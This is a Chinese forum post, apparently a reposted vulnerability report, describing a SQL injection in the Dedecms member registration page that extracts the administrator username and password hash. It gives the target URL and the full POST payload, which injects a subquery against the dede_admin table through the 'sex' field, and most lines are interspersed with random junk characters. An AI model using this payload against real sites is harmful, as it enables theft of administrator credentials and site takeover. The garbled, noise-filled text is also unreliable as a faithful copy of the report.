漏洞类型: SQL注射漏洞
' R) ?; a; }( A# h. c+ n$ u9 k简要描述: U! k" |3 `* Q/ C" E: q. a8 |
/ ^$ s0 U/ F+ Q7 F需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
' d& k+ t1 ^. k9 {* x原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.! H' w& o! K3 K( e' }9 |
详细说明:跟这个漏洞
" w5 ^& R- f7 D" O E2 O$ M7 s
* n/ u _4 Y( X& u, T6 f- n- e$ RWooYun: Dedecms SQL注射导致审核机制绕过漏洞1 P; F, r5 V% X' z. s5 b4 L
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.2 n1 V: d% s# a( F, ~
POST提交以下数据,其实不用POST提交的,这样隐蔽点.5 G: q. q8 c a. e9 P; R" W
7 S8 |, ?/ j$ z
www.political-security.com/member/reg_new.php
6 z: w! t* U3 W3 }
9 ^+ x' Y3 P& O h% p1 A" g1 OPOST8 I# q# ?! f6 ^& A( k2 z: a
8 g+ E- u9 N) r% e: E& j
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&% ^; _* T9 S4 @7 o" |
userid=c4rp3nt3r&uname=c4rp3nt3r5 K1 @+ r4 z0 R% K/ F8 h% U9 B
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss$ X% N H6 M6 ^4 D# Q
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
C% P$ e. j B p; H) n(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');% @( c4 ?6 @$ K6 V! o' g
%00&vdcode=glos&agree= |
发表于 2013-1-19 08:25:02
收藏
支持
反对